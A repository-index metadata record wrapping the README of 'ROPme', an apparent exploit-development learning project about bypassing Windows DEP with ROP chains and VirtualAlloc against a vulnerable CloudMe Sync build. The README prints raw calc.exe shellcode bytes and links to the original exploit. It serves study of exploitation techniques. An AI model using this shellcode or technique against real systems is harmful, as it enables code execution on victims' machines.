{"id":27462134,"url":"https://github.com/x86byte/ropme","last_synced_at":"2025-04-15T21:51:24.478Z","repository":{"id":255943133,"uuid":"850794902","full_name":"x86byte/ROPme","owner":"x86byte","description":"Windows Exploit development : Bypass Data Execution Prevention (DEP) using ROP chains manually hard code","archived":false,"fork":false,"pushed_at":"2024-09-05T05:06:09.000Z","size":1182,"stargazers_count":5,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-03-29T01:51:42.854Z","etag":null,"topics":["exploit-development","return-oriented-programming","user-mode","windows-exploitation"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/x86byte.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-09-01T19:48:51.000Z","updated_at":"2024-11-30T11:07:29.000Z","dependencies_parsed_at":"2024-09-08T02:51:14.962Z","dependency_job_id":"cae8e7df-bcac-4d6b-8b73-6e3f3f13592f","html_url":"https://github.com/x86byte/ROPme","commit_stats":null,"previous_names":["onomatopwn/ropme","ring0-c0d3-br34k3r/ropme","x86byte/ropme"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/x86byte%2FROPme","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/x86byte%2FROPme/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/x86byte%2FROPme/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/x86byte%2FROPme/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/x86byte","download_url":"https://codeload.github.com/x86byte/ROPme/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":249161104,"owners_count":21222468,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["exploit-development","return-oriented-programming","user-mode","windows-exploitation"],"created_at":"2025-04-15T21:51:23.837Z","updated_at":"2025-04-15T21:51:24.472Z","avatar_url":"https://github.com/x86byte.png","language":"Python","readme":"# ROPme\nBypass Data Execution Prevention (DEP) Using VirtualAlloc in a ROP (Return-Oriented Programming) chains is a common technique to bypass DEP (Data Execution Prevention) by allocating executable memory in a process. The idea is to use a sequence of gadgets (short sequences of instructions ending in a return) to call VirtualAlloc or a similar function and allocate memory with PAGE_EXECUTE_READWRITE permissions. This allocated memory can then be used to execute shellcode\n\n![image](https://github.com/user-attachments/assets/ba318158-d6c6-462b-94a8-83b803af2827)\n\n\n\n## i start from [here](https://www.exploit-db.com/exploits/46250)\n## [CloudMe Sync 1.11.2](https://www.exploit-db.com/apps/f0534b12cd51fefd44002862918801ab-CloudMe_1112.exe) vulnerable version\n## --\u003e i use :\n### - [WINdbg](https://learn.microsoft.com/en-gb/windows-hardware/drivers/debugger)\n### - [immunity Debugger](https://debugger.immunityinc.com/)\n### - IDA pro \n### - SublimeText \n### - IDLE from python \n### - [VirtualAlloc](https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc) function (memoryapi.h)\n### - and finaly the calculator shellcode :\n```sh\n\n# Shellcode calc.exe\nshellcode = \"\"\nshellcode += \"\\xdb\\xde\\xd9\\x74\\x24\\xf4\\x58\\x2b\\xc9\\xb1\\x31\\xba\\xef\"\nshellcode += \"\\xc3\\xbd\\x59\\x83\\xc0\\x04\\x31\\x50\\x14\\x03\\x50\\xfb\\x21\"\nshellcode += \"\\x48\\xa5\\xeb\\x24\\xb3\\x56\\xeb\\x48\\x3d\\xb3\\xda\\x48\\x59\"\nshellcode += \"\\xb7\\x4c\\x79\\x29\\x95\\x60\\xf2\\x7f\\x0e\\xf3\\x76\\xa8\\x21\"\nshellcode += \"\\xb4\\x3d\\x8e\\x0c\\x45\\x6d\\xf2\\x0f\\xc5\\x6c\\x27\\xf0\\xf4\"\nshellcode += \"\\xbe\\x3a\\xf1\\x31\\xa2\\xb7\\xa3\\xea\\xa8\\x6a\\x54\\x9f\\xe5\"\nshellcode += \"\\xb6\\xdf\\xd3\\xe8\\xbe\\x3c\\xa3\\x0b\\xee\\x92\\xb8\\x55\\x30\"\nshellcode += \"\\x14\\x6d\\xee\\x79\\x0e\\x72\\xcb\\x30\\xa5\\x40\\xa7\\xc2\\x6f\"\nshellcode += \"\\x99\\x48\\x68\\x4e\\x16\\xbb\\x70\\x96\\x90\\x24\\x07\\xee\\xe3\"\nshellcode += \"\\xd9\\x10\\x35\\x9e\\x05\\x94\\xae\\x38\\xcd\\x0e\\x0b\\xb9\\x02\"\nshellcode += \"\\xc8\\xd8\\xb5\\xef\\x9e\\x87\\xd9\\xee\\x73\\xbc\\xe5\\x7b\\x72\"\nshellcode += \"\\x13\\x6c\\x3f\\x51\\xb7\\x35\\x9b\\xf8\\xee\\x93\\x4a\\x04\\xf0\"\nshellcode += \"\\x7c\\x32\\xa0\\x7a\\x90\\x27\\xd9\\x20\\xfe\\xb6\\x6f\\x5f\\x4c\"\nshellcode += \"\\xb8\\x6f\\x60\\xe0\\xd1\\x5e\\xeb\\x6f\\xa5\\x5e\\x3e\\xd4\\x59\"\nshellcode += \"\\x15\\x63\\x7c\\xf2\\xf0\\xf1\\x3d\\x9f\\x02\\x2c\\x01\\xa6\\x80\"\nshellcode += \"\\xc5\\xf9\\x5d\\x98\\xaf\\xfc\\x1a\\x1e\\x43\\x8c\\x33\\xcb\\x63\"\nshellcode += \"\\x23\\x33\\xde\\x07\\xa2\\xa7\\x82\\xe9\\x41\\x40\\x20\\xf6\"\n```\n\n# Demo \n### [Youtube video](https://www.youtube.com/watch?v=Jmxx7TdAzgw) \n\n# References\n- [CS6265: Reverse Engineering and Binary Exploitation Lab](https://tc.gts3.org/cs6265/2021/_static/tut.pdf)\n- [Exploit Development: Hands Up! Give Us the Stack! This Is a ROPpery!](https://connormcgarr.github.io/ROP/)\n\n- [Beenu Arora. Shell code for beginners](https://www.exploit-db.com/docs/english/13019-shell-code-for-beginners.pdf)\n- [Exploit-db Ashfaq Ansari. Egg-hunter, a twist in buffer overflows](https://www.exploit-db.com/docs/english/18482-egg-hunter---a-twist-in-buffer-overflow.pdf)\n- [Exploit database John Leitch. Windows/x86 (xp sp3) (english) - calc.exe shellcode (16 bytes)](https://www.exploit-db.com/shellcodes/43773)\n- [National institute of Standards NATIONAL VULNERABILITY DATABASE and An official website of the U.S. government Technology. Most recent official vulnerabilities in vlc media player](https://nvd.nist.gov/vuln/search/results?form_type=Basic\u0026results_type=overview\u0026query=vlc\u0026search_type=all)\n- [Security Stackexchange. What does eip stand for](https://security.stackexchange.com/questions/129499/what-does-eip-stand-for)\n- [Stackoverflow. What and where are the stack and heap](https://stackoverflow.com/questions/79923/what-and-where-are-the-stack-and-heap)\n- [Stackoverflow. What are the esp and the ebp registers](https://stackoverflow.com/questions/21718397/what-are-the-esp-and-the-ebp-registers)\n- [Stackoverflow. What is a reverse shell](https://stackoverflow.com/questions/35271850/what-is-a-reverse-shell)\n- [Microsoft Support. What is a dll](https://support.microsoft.com/en-us/help/815065/what-is-a-dll)\n### What are mitigations?\n- Over the years, new generic defense methods have been added to the new systems, which\nof course, as the name implies, do not prevent but mitigate or make exploitation more\ndifficult. \"[Customize exploit protection](https://learn.microsoft.com/en-us/defender-endpoint/customize-exploit-protection)\"\n\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fx86byte%2Fropme","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fx86byte%2Fropme","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fx86byte%2Fropme/lists"}